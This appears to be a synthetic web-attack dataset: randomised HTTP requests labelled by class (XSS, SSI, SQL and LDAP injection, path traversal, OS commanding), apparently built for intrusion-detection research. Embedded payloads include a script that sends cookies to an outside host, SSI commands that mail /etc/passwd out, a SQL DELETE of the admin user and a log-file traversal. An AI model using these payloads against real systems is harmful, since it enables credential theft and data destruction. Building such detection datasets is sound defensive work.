Cookie: 2e=rigooklE;hpHcioe4t=jrcGo_;aexno3u2is=uns4bno;lp=6811;twsif=N
Cookie2: $Version="491"
Date: Tue, 18 Dec 07 23:43:58 UTC
ETag: W/"b-3HRHuMckDu@e-89"
Expect: 3ms1era
From: t9xyb@dtrmz.gov
If-Modified-Since: Wed, 04 Mar 09 04:33:06 CET
If-Unmodified-Since: Fri, 05 Aug 05 24:01:21 UTC
If-Match: "PdJHcuhFuvhPwd6"
If-None-Match: *
If-Range: Wed, 29 Mar 06 17:05:10 UTC
Max-Forwards: 13
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic dTA3NjZPNnI6cm9ndW8=
Range: 794-
Referer: /t6imnfNh/nwn7.sh
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/2.5 (Windows; U; WinNT 3.8; nw-ww; rv:7.2.4) Gecko/87520169
UA-CPU: PowerPC
UA-Disp: 2831,824,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9591x1965
Via: 8.8 www.iaaR.jpeg:18
Transfer-Encoding: gzip
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 49.36.115.120
X-Serial-Number: 87544886060
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49894
Start - Id: 46996
class: XSS
GET /rZnun/sQf/renzdcdeeqnDrwt/Z5bhttpsfwdYDHN/8e.php?gtlhy6slg=%3Cmeta+http-equiv+%3D++++%22+++refresh++%22++content++++%3D+%22+++++0%3Burl%3Djavascript%3A%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.li.com%2Fcgi-bin%2Fnatierisch.cgi%27%2Bdocument.cookie%29%3B%5D++++%22%3E HTTP/1.0
Host: 96.176.225.233:014
Connection: cnoe7
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ds-77Ss6nw;q=0.8
Cache-Control: only-if-cached
Client-ip: 0.51.121.220
Cookie: to=71106764;8feanotewugh=crfavuw;atYC1wauLf6A=9002;etqrI=0nbetweensprylDb)3sh;<b ;eirad4ae=cqnqQn
Cookie2: $Version="5"
Date: Sat, 08 Sep 07 10:50:08 CET
ETag: "f-DBP8aMNHaaIY12Y"
Expect: 3vtn=oa9Wm;sdoo2=dbcNoIu8
From: ott8b@Cjemsdre.it
If-Modified-Since: Sat, 28 Feb 04 09:10:24 CET
If-Unmodified-Since: Sun, 23 Sep 07 04:05:18 CET
If-Match: "31y3tbGm0ffYRfQrxv"
If-None-Match: *
If-Range: Fri, 09 Oct 09 08:49:57 GMT
Max-Forwards: 038
MIME-Version: 0.5
Pragma: rlane2i='2'
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Basic d29oT2U3dDplYUhlc3RJ
Range: 5-22964
Referer: /ccn22.shtml
TE: trailers
Trailer: Upgrade
User-Agent: lnrelcsOoTn
UA-Disp: 0784,5825,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: HTTP/5.9 www.nlRhh.tiff, 9.9 119.44.95.43
Transfer-Encoding: identity
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 352 28.5.137.111:2561 "wEaonerhna" "Mon, 13 Sep 04 13:04:56 UTC"
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46996
Start - Id: 40165
class: SSI
GET /tetzwhtxlecad/E9OH5tmp/hU7eB/jaJ9g4K/rEotT7EmntH0Doeagl/uboot.iniZ1tR0C9Vam@3X/st3zVtdTa.sh?oytcbwv=04002&DEcgcuo=pths1E&ietpfaedEtm=ujREweSETcC&rsEamy9goqSv=2179813&Cwo7=%3C%21++%23%3C%21--++%23exec+++cmd%3D%22id%22--%3E&0ioss=o8m3ji&ocsweatireoara=ilv9ub%404&t0MTt7pnyeaMhYl=+h%29a6%5Cposition%3Fht&eezurnlbl=8308002&auqhtoaemeo=u&tntei=lCQ&henvnitxx=s3%40&BnOApwI1winnt=lb82d&tYS52-SKv=bstyled%25r8NNopenbre HTTP/1.1
Host: 252.142.58.121:80
Connection: 7ynUUt3y
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 165.96.86.136
Cookie: xEaiweccdhtl=450;w-dT=c7it;pfzi4dhdroef=aumttc2cmdewimgont;dmsywd= i1;eQietqer=L;usmyea=ssnshutdownpi0hatinrtn
Cookie2: $Version="35"
Date: Fri, 17 Sep 04 11:41:17 CET
ETag: "9ENzzSiQjoUmbVMLIYHc"
Expect: 100-continue
From: stce@ygsk.st
If-Modified-Since: Mon, 03 Aug 09 19:21:58 UTC
If-Unmodified-Since: Tue, 24 Feb 04 15:57:33 CET
If-Match: "AL.F6CMJtkYMIf4LgT"
If-None-Match: *
If-Range: Sat, 26 Jul 08 09:39:19 GMT
Max-Forwards: 122
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: NTLM bnNhTzVvaG96dGFubGljSWhyYXBlbTdzZXRtaGljZWhrdWZzcG8=
Range: 728-,7-688430
Referer: /hoeetpei/rbatglwe/rY35mej/hNtre.sh
TE: trailers
Trailer: Warning
User-Agent: Mozilla/6.9 (X11; U; Linux i386 8.1; Em-kp; rv:6.4.7) Gecko/90381300
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: 0.0 20.23.193.181
Transfer-Encoding: compress
Upgrade: w70e/2.8, naoa/9.2, ror/0.7
Warning: 869 194.107.104.219 "zteAwiu4sn" 
X-Forwarded-For: 165.252.155.117
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40165
Start - Id: 40061
class: SSI
GET /hxl/browetehNuter/al/h4_FKL1h9AxH/bxflAGhZtGZP0/vet.tiff?nhcegw=bi%2Flibe%2FuOaa&YrmstdinH2=ei&sdze=%3C%21--++++%23exec++++cmd%3D%22%2Fbin%2Fmail+++++io.com+%3C++%2Fetc%2Fpasswd%22--%3E&bnhdutcpkieosa=%25&vedm0tirna=30878414&W2ymU6y=aoeNu&OMdrl8r=5643508843 HTTP/1.1
Host: 240.123.13.149
Connection: keep-alive
Accept: image/png;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, deflate;q=0.4
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 152.166.126.235
Cookie: 2mwcmOKnKEHe=pelogmhs
Cookie2: $Version="54"
Date: Fri, 31 Dec 04 12:45:53 CET
ETag: W/"kZJu3IoTYGcSKFBiD@c"
Expect: ursla2l
From: atth5@DlahcYr4ai.cz
If-Modified-Since: Thu, 22 Jul 04 19:40:32 GMT
If-Unmodified-Since: Mon, 07 Jul 08 13:22:33 CET
If-Match: *
If-None-Match: "cooLCjGjNSxKSywuVt"
If-Range: "2xVwbdu7L_p3UgWPX6S8"
Max-Forwards: 98
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM bmVtZWRlNGJvcG1nc2VNY3Z2ZWU0ZWI0c29sYXRuRW0xb2hzbjBrZ3Rzcw==
Authorization: NTLM bmxub0pkRHN3ZHRuYWlsYXJ0dXIzbm9udGNNNmlpcm9oaGlmcmVyNmVpZEFTc2ll
Range: 8082-34430,77209-030140,-38
Referer: /lodiacfa/eosWn/RkTisbc/eo8tohf/1i3Thwse.jpeg
TE: trailers,gzip,deflate;q=0.0
Trailer: User-Agent
User-Agent: Srfi6nnr
UA-CPU: PowerPC
UA-Disp: 665,2462,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8002x1361
Via: 8.9 157.177.121.60, 3.4 www.d8trTeI.htm
Transfer-Encoding: deflate
Upgrade: eyee/8.5, tmg/7.0
Warning: 301 www.aNxatsl.gif "mcn8ho5" "Mon, 26 Jan 09 23:46:07 CET"
X-Forwarded-For: 67.12.1.93
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40061
Start - Id: 37142
class: LdapInjection
GET /iHKqOj8eZCxB5ImpFr@/ee8aBBZX/psCk@lzTiviFs3m4/zccf/Aoaet3a1.bin?pgnxyhgatsi=sock_stream&jYQEtk-A=%29+++%28+++%7C++++%28+cn%3D*o++%27brien*+%29%28mail++++%3D*o+%27brien*%29++&wbsnjd=1d64s&yeosisrs9oJAHda=ahfeaWa HTTP/1.1
Host: www.aeaEl.it
Connection: n2eS
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: iIc90c-4tpda, a-oban, eoeua1a-btEdoij
Cache-Control: max-age=53
Client-ip: 186.207.13.158
Cookie: c3itnmuu=a yli0;wnmemrqh=2763477585;74opzSGW=30;aIAqX4.1c=(
Cookie2: $Version="395"
Date: Mon, 10 Apr 06 01:57:35 CET
ETag: W/"0xXDm_hysMwnCgoAJ"
Expect: 100-continue
From: m0oefy@tNuodgrTta.org
If-Modified-Since: Tue, 23 Jan 07 23:28:38 CET
If-Unmodified-Since: Thu, 29 Apr 04 22:21:01 CET
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: *
If-Range: Wed, 13 Jun 07 10:00:49 GMT
Max-Forwards: 947
MIME-Version: 8.7
Pragma: p0lumc='caall5el'
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: obeo ubgeHz=riMnec
Range: 88347-,9-
Referer: /8galtec/j3mrped.css
TE: trailers,chunked;q=0.8,gzip;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/8.9 (Windows; U; Win 9x 3.0; Ne-is; rv:6.8.3) Gecko/08907326
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: HTTP/7.6 157.177.143.16, 0.9 www.liim.css
Transfer-Encoding: compress
Upgrade: eeobe/9.2, f52tru/3.2, voall/1.2, uIsa/9.0
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 248.38.25.114
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37142
Start - Id: 36254
class: PathTransversal
POST /nUwk9kMmEw5ACvP4LW/xv0HDtaZ2JMItz/iihierta5O/ooAts.oiSnghw.cfm? HTTP/1.0
Content-Length: 210
Content-Language: dya2nr,fp3tiak
Content-Encoding: deflate
Content-Location: /qopouDrd/uccjictu/sxmh/i7itoRqs.conf
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Mar 05 24:27:20 GMT
Last-Modified: Sun, 01 Feb 09 12:08:25 UTC
Host: 228.222.182.212
Connection: geen9i
Accept: video/*;q=0.5
Accept-Charset: iso-8859-6;q=0.9, x-mac-turkish, euc-kr;q=0.3
Accept-Encoding: compress
Accept-Language: noystt4t-zoesrld;q=0.0, Rarqaid-naaSdf;q=0.2, il-slfdInn
Cache-Control: no-store
Client-ip: 44.220.122.164
Cookie: rNopadbwagmeo2t=eIlM;9tginmnP=qK11jFCRb;1irss0ovoik=oeweeunthunOs;KtNQwEJOMRB=6
Cookie2: $Version="7"
Date: Sat, 03 Jun 06 04:31:07 CET
ETag: W/"jRY8PxZkXX-fCGouhR8"
Expect: eigacm=eafotax;3ngniEI=1owL6ot
If-Unmodified-Since: Tue, 27 Nov 07 15:16:24 GMT
If-Match: *
Max-Forwards: 92
MIME-Version: 4.1
Referer: /Pgi9.asp
User-Agent: Mozilla/0.2 (Windows; U; Win 9x 3.2; Gc-e0; rv:8.9.0) Gecko/16227847
Transfer-Encoding: compress
Warning: 299 www.ni9etq.css "deecyxs" "Sun, 01 Apr 07 19:16:21 UTC"
X-Serial-Number: 373561345188
----: -------------------------------------------------

Okyi9cSt=../../../../var/log/access_log%00.html&neg5iabe=stk3bo]&xlsh1H0O=5198367&rn9iolxiddx=tetw&Ddxnetcat3@ZZRmM3=287&OkrwbetlLib=rnAf4fVZmZ&se9NhVtml3=r/lneherdo&dt=3076771925&eiisutetgH=8

End - Id: 36254
Start - Id: 38872
class: LdapInjection
GET /oH/nnV/dAg0cs1ti0iFdoeAtn.cgi?aosgomvoRht=S%3Ce-4&Llmcy1ea=s+e+idEhtacces%5Coip8%24e&j1ws0ZoiThSecwo=is9pgQ5&EeaRShcui1i0fri=%3Crinc+ewh%5CpshE4ee%251v&BcmiOzkW@G2_=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.k1muodt.fr
Connection: close
Accept: audio/*, image/*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 9.41.106.201
Cookie: passthruViX=621854;Rspar=irCghp;9iHzoahhsotg=41;r23retiwp7pme=dXFloKY_uQwA;ipositionHwt7OU2=j5n3ete5oesheca
Cookie2: $Version="37"
Date: Mon, 04 Apr 05 12:52:28 GMT
ETag: "OCfbQBx-AQOh@IfI"
Expect: aetlNI
From: w08rh3@rpehekeyi.com
If-Modified-Since: Fri, 06 Feb 09 23:41:50 CET
If-Unmodified-Since: Thu, 14 Aug 08 12:22:36 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 926
MIME-Version: 2.9
Pragma: a=pybortsb
Proxy-Authorization: Digest nc=7636d743
Authorization: Basic ZWVmaXdhOnFjYXkzYQ==
Range: 15934-,799-8058,-81465
Referer: http://www.4goriet.be/47ipr/8nanE/IrQbar4y.bin
TE: trailers
Trailer: Via
User-Agent: Mozilla/1.2 (compatible; Konqueror/8.9; Win 9x; tdaaasR; hihpthaeu; vioz)
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 279x383
Via: 4.8 177.85.239.83:146, 1.9 149.84.195.172, 5.1 103.39.246.22:68632
Transfer-Encoding: gzip
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 208 www.eiujur.shtml "niihn9Buntieeetne0nn" "Tue, 17 Oct 06 02:46:38 CET"
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 706863
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38872
Start - Id: 41341
class: SqlInjection
GET /oanYqkBPj/cotaD/a3K_67kvC2daCg/xterm.rQj_L6Wwget4U63X/rH.php3?inap4tkaaOy=853019&Tami=shutdownsam&tbtegiyg2icnqa=tiiw2eeand&D_cD=vxv&TkH@OF-=htoatxwhere&ea1Ssirr5aici=+&orottrAoazgya=l%7Eelitt-pe7avhr%7En&ewrlswz3sklEipi=5033656&NlibL2xLFE=so4ss+w%5Bxmlirre&wSsst=oWC&eieb4Laua7=+%29%7CeI+%7C8ar&ngtb8=aoenrmimong+psa%5D4+tr&eapegenebl=gnTkne9cuncaoueone&hh=tYLgdd1.m7N HTTP/1.0
Host: www.andmlsd.st:80
Connection: 7reae
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 27OffIi-ecoisni, at-rYm, etAn-e, n-cti13;q=0.6, eehljfhW-n;q=0.8
Cache-Control: no-transform
Cookie: -A4UbetweensA=7shLilrt'   ); DEL/**/ETE    FROM users    WHERE   upper(username)  =     upper( 'admin;zssra=iKFTe1q-j9q;Eulta4o4ris=Eoaes4kfetylyeD
Date: Sat, 15 Oct 05 09:05:16 GMT
ETag: W/"U240.iikyberOOic-UQb"
Expect: 100-continue
From: a23enet@bjpahehn.be
If-Unmodified-Since: Wed, 18 Jan 06 09:55:54 UTC
If-None-Match: "ghKZw6_r8oGSglJtju"
Max-Forwards: 100
Pragma: ieer2it='jbkooIe'
Proxy-Authorization: NTLM cndtY0ljbWVwaXJjck1pSHRydG9Scm9BNHNlcHRsaGltcnN5bjlmcg==
Referer: /tUq1h.jpeg
TE: trailers,gzip;q=0.5
User-Agent: Mozilla/1.3 (Windows; U; Win98 5.1; dl-ie; rv:0.2.0) Gecko/05842123
UA-CPU: Sparc
UA-Color: color16
Via: 3.3 245.20.195.162, HTTP/7.8 186.176.58.204:863
Transfer-Encoding: gzip
Warning: 295 205.202.137.28 "hsvil2qttnsctesmniA" "Thu, 19 Oct 06 01:03:18 GMT"
----: -------------------------------------------------

null

End - Id: 41341
Start - Id: 43269
class: OsCommanding
GET /te6LEaeK6RZGV/eFTzrR2nXDQ1@pet5e4m/ZgQDho5VSchttpsrfromDshutdown/eZeo34d8PgpOL/sauienipc6heonU/httpsuCH3b.jsp?inee6aiemvdodE=4or&HrhacecsmARNulu=o3eessn7rwdxq&zdycSea=rajcopyuvTiiexmlnc&EEfd2ysMzl=%2Fperl+++%2Ftmp%2Fllor.pl++++-p8902 HTTP/1.0
Host: 109.220.139.247:80
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.8, identity, compress;q=0.0, gzip;q=0.1
Accept-Language: *
Cache-Control: min-fresh=77070
Client-ip: 116.247.114.110
Cookie: eg=8i;meta7CA=i-HF;iOsystem7Vm=wntdo5&9e;emleygdrcnRt=67258735;lrt=wftphopens;guetaoasns7=uhsfni0ct
Cookie2: $Version="118"
Date: Sun, 25 Mar 07 13:58:44 UTC
ETag: "PEioMFbnQm-_spjg_"
Expect: 9htstsrd
From: heEwPmnx@hafimu3.ch
If-Modified-Since: Thu, 16 Sep 04 18:24:47 UTC
If-Unmodified-Since: Sat, 12 Mar 05 19:13:53 CET
If-Match: "O_-kZz9GkW_-wJe"
If-None-Match: "yGEKBLINiOjw5dxhZM"
If-Range: *
Max-Forwards: 171
MIME-Version: 9.7
Pragma: j='eereeA'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: miGNhs ei7ogr0=oonmr
Range: 6444-90250,-039,9-0896
Referer: http://www.eescsre.fr/ancshT/sSentT/ilotna/onaMdtd/tfz8.js
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Range
User-Agent: pAbGr2EWmN http://www.Mcuihnl.net
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 842x6548
Via: 5.4 www.nwye6p.jpg, 9.7 116.141.0.129
Transfer-Encoding: identity
Upgrade: lnphe/4.9
Warning: 934 17.5.242.239 "e3Wid9U2agIl" "Sat, 08 Aug 09 05:17:30 GMT"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 5980220981423198
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43269
Start - Id: 46952
class: XSS
PUT /ea/bgn1hwAjkrwyA0s/7d7bXrANtH4L7E/gvhEoo9tr96scvd/rLdK/g_/qu@p..@.png? HTTP/1.0
Content-Length: 232
Content-Language: 4e0fe,nn3,rikAc
Content-Encoding: identity
Content-Location: /ce87asak/nwatht/ynoati/O6ebzhr5/baatawWo.conf
Content-MD5: bmFud250b3R0ZXNlOWIwZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Apr 05 04:41:52 GMT
Last-Modified: Sat, 15 Mar 08 09:36:08 CET
Host: 123.253.116.70:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.3
Accept-Language: i5nmmwee-2h, h-ttn1eta;q=0.6, s-ear6cet, c-Rlisili6, hnMtlals-sekgnS;q=0.1
Cache-Control: lwsergu=Iedhcd
Client-ip: 15.111.69.143
Cookie: geebansc=e8vEkOUN;eiabov0mreurf=zgNIeySc9H;zdcbinZH3=egiisxyzir\nr2
Cookie2: $Version="52"
Date: Tue, 21 Feb 06 23:19:45 GMT
ETag: "NViduy7oqvlSc-i"
Expect: mexltil=sUytWu
From: 2cxo@n9mijtAeoE.biz
If-Modified-Since: Sat, 08 Sep 07 02:06:19 GMT
If-Unmodified-Since: Sun, 08 Jul 07 12:09:50 CET
If-Match: "S4vIIFLQRqZ8yp.V.L1V"
If-None-Match: "ys@0adoX_F41_.aRsRgV"
If-Range: *
Max-Forwards: 1
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic Z2VveGk6ZXRhbjFvdA==
Authorization: EbVht ttmrelsa=rtwds
Range: -3291
Referer: http://mbtsWars.gov/euff/8Itr/7lexr/poey.htm
TE: gzip,trailers,chunked;q=0.3
User-Agent: Mozilla/5.6 (compatible; MSIE 6.9; Win98; huned)
UA-CPU: StrongARM
UA-Color: color8
Via: 5.3 151.186.75.226, FTP/8.3 www.dyeahsn.gif
Transfer-Encoding: compress
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9i3bioe=vhU4LQ2&ronpTDtt=6&JpQB=1174882&eorgo=<img  src   ="  inde    "onmouseover   =    "  [alert  ('goN2etenaw');]   " >&d7surtHy=hdA&leno9dwoiajd=5&5ozak8lt=Oatmjide&aw1ws4Noee=wgetd  &6osli1eoccg=0

End - Id: 46952
Start - Id: 41203
class: SqlInjection
GET /imEee/.XKChRdscf2/lzgnmoMAcyt/oc.asp?cr=bsens&idti=913484&Gnhiedvnnxtpa=Tras&8st=ee&ceibet=e1e3o0x%40&_pVJscriptv4R=27579&ia9Rsa5hirt8=ad+n3yiyeham&rnoaraRsle=06945&4I1.ZEvlsJEP1=nsamahbgsoundtRi&nomi=3eoidogiaf&ruaentl=3018360 HTTP/1.0
Host: www.hxtnO0sa3.cz
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr, euc-cn;q=0.1, windows-1251
Accept-Encoding: 
Accept-Language: 31rEnyV-u;q=0.2, eeeuaLi-4aeijvb;q=0.3, ttso1w-fyWw, h4ti-d3;q=0.1
Cache-Control: no-cache
Client-ip: 94.220.117.172
Cookie: r2o=laEsr;turclnem=e.K@lAUz_
Cookie2: $Version="6"
Date: Sat, 23 Jul 05 05:50:28 UTC
ETag: W/"EEGkhT5mI@eMWl_1"
Expect: ttfr=i4irsb;s65p1tr=etl9i
From: aaoa@eCueedro8q.cz
If-Modified-Since: Tue, 02 May 06 07:29:08 UTC
If-Unmodified-Since: Fri, 03 Apr 09 07:47:35 GMT
If-Match: "VLk6Hk1THR8xrseFm9"
If-None-Match: *
If-Range: Tue, 11 Dec 07 07:28:12 GMT
Max-Forwards: 45
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: QnNEm sle7s=ykdes
Authorization: Basic b1N0Z1M5ZXI6M3lob3M=
Range: 38-,7259-27,6749-28
Referer: /ghytr/ftnpAbd.dll
TE: trailers
Trailer: Accept-Charset
User-Agent: ' ) UNION ALL SELECT     8 FROM   cr9Cbe  WHERE   ( ''= '
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9560x6945
Via: HTTP/2.1 69.255.206.34, FTP/6.3 111.61.85.38, 9.7 www.gAie.html
Transfer-Encoding: compress
Upgrade: sibl6/5.1
Warning: 023 www.aubonl.html "brwUpele7rpookpse" "Tue, 09 Mar 10 24:01:48 CET"
X-Forwarded-For: 25.2.55.98
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41203
Start - Id: 40086
class: SSI
GET /kI1oKWGNJmc3cG.html?VOWFs3d8A=4275167&oydorttthnryai=%3C%21--+++%23exec+++++cmd%3D%22%2Fbin%2Fmail+++++stael4wii.com++%3C+++%2Fetc%2Fpasswd%22--%3E&uK4perlWWE3O=atibeotp1%7Cbetweenit%5Dwp-me&3heqialneteawe=yulSsm&Rle1cz=se&ijntlfS=++%3Fha HTTP/1.1
Host: 164.216.190.36
Connection: keep-alive
Accept: video/quicktime;q=0.7, video/*, audio/*;q=0.9
Accept-Charset: koi8, utf-7
Accept-Encoding: identity, gzip;q=0.9
Accept-Language: *
Cache-Control: hu=is
Client-ip: 139.170.207.9
Cookie: tre9a=nhy
Cookie2: $Version="080"
Date: Sun, 10 Aug 08 18:14:10 UTC
ETag: W/"t_9Ac4oG2tQdKAOiS0"
Expect: iotagppj=M2nn;eceo=idattnde
From: eolu8j@aioa.fr
If-Modified-Since: Wed, 08 Feb 06 03:44:40 GMT
If-Unmodified-Since: Thu, 20 Apr 06 20:45:45 CET
If-Match: "xPd-f2EM.rHLxna"
If-None-Match: "fk8cu4sMfGdoBgsFDG"
If-Range: Sat, 25 Apr 09 22:13:54 CET
Max-Forwards: 534
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: NTLM aHJlb3M2TWlpdGVvbW5OZVR1d29lM2lpdGFpdHNlaGV2UnRkc2x0ZWU=
Range: -170
Referer: http://www.onhO.org/toshad.tiff
TE: gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.7 (Windows; U; Win98 5.6; uk-re; rv:8.3.8) Gecko/52707463
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0944x596
Via: 0.8 www.rnifoste.htm, 7.1 www.ycgej0.js:1, myx1n/2.9 www.mcrodi.htm
Transfer-Encoding: Redce
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 9018401167222078
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40086
Start - Id: 39900
class: SSI
GET /juMbFEZ/d8h-C2jfmtAOw/u@yFQQeJJ4zk5/d_8tIS4EZy8lBDpS1KV7/Incouesva2Tn/oqXj-/mLM7Ldvw/r8n/rbQL4OIyT7.mkZOtU.asp? HTTP/1.0
Host: www.jeutess.biz
Connection: close
Accept: text/html, video/quicktime;q=0.9
Accept-Charset: euc-tw;q=0.9, iso-8859-6;q=0.9, x-mac-turkish
Accept-Encoding: 
Accept-Language: epuein-easfaezh;q=0.4, oskto-reIaa;q=0.3, o-sop;q=0.7
Cache-Control: min-fresh=5491
Client-ip: 235.145.238.65
Cookie: rlq=716486742;pmeta3P8=<! #<!--     #exec cmd="id"-->;xpfIibwod9kne6=x5esEszU3;sttkGnaE=>ico]tn;licsolknTe=$InotlrjVw
Cookie2: $Version="6"
Date: Fri, 22 Feb 08 03:15:35 UTC
ETag: W/"BU@MDEQDakoBFNK8__Mc"
From: leizoakt@re9vbeas.org
If-Modified-Since: Wed, 15 Jul 09 09:59:50 UTC
If-Unmodified-Since: Mon, 09 Jun 08 08:30:32 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Jan 09 20:37:40 GMT
Max-Forwards: 26
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic aHp0dXZzdTp0ZG9nYm8=
Authorization: NTLM YzkwUmV0aWNkOWg4RHBkb2wzdGludG9tdGFzdG9lZGlBcnVzOGVhdHZ0Ng==
Range: 842323-9393,06-9
Referer: http://www.aonn.de/au4ia/7ti6/btrehr/hnihtdd/iaEyab.rar
TE: deflate;q=0.3,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 1.9; lh-so; rv:7.6.5) Gecko/72348610
UA-Disp: 1870,660,32
Via: FTP/8.3 www.i6ym.css, 2.5 www.wmyausl.png, 8o7/0.3 164.39.250.39
Upgrade: locca/0.3, trUpHn/2.0, mpas/3.5, trfR3T/9.6, sssuds/3.3
Warning: 869 140.179.129.191 "ghaet4orot" 
X-Serial-Number: 1738547053
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39900
Start - Id: 40055
class: SSI
GET /S9F3phpNcf@/toAehz/ourissnilza/aydHufnQFAqn6i7vArlQ/9smcyeBQafkQ/Em7hihudeokelRiNtcv.mdb?Me=orty26wbeRee3cac&hhoeiozbles=yIBe&@HrWkL=qk&ptPqioalio=2isf&8g=shutdown%7EdSi-n%3EfromOT+&eeliIicrrEljl=ll+n6utm0cde%3Bgroup+byaphp%2F+%28&da9es=%3C%21--++%23exec+++cmd%3D%22%2Fbin%2Fmail+++++EgSjtzTr.com++++%3C+++++%2Fetc%2Fpasswd%22--%3E&pf=bmedtyftkdfjc HTTP/1.1
Host: www.hzeioag.uk
Connection: hahenint
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: lWe5wrN-tvehl5ok;q=0.7, yow-5urndiO, etob-2htfohxb;q=0.8, 5rt-4I;q=0.4
Cache-Control: no-cache
Client-ip: 9.121.250.171
Cookie: Ekf5oenm=ijnrPaoi6;tetgrwnr22=xlE=yohttpseeglteng>otaccept;hhsedepdnarFe=)b autoexece;o7=1053;t0vd=08209722
Cookie2: $Version="9"
Date: Tue, 25 Oct 05 15:32:31 GMT
ETag: "E13puIippJH_MZisUTlR"
Expect: 100-continue
From: eto0Hh@8untinHaB.de
If-Modified-Since: Sat, 06 Mar 10 15:33:13 UTC
If-Unmodified-Since: Sun, 24 Feb 08 02:23:35 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9045
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic bWVlb206aXVvdA==
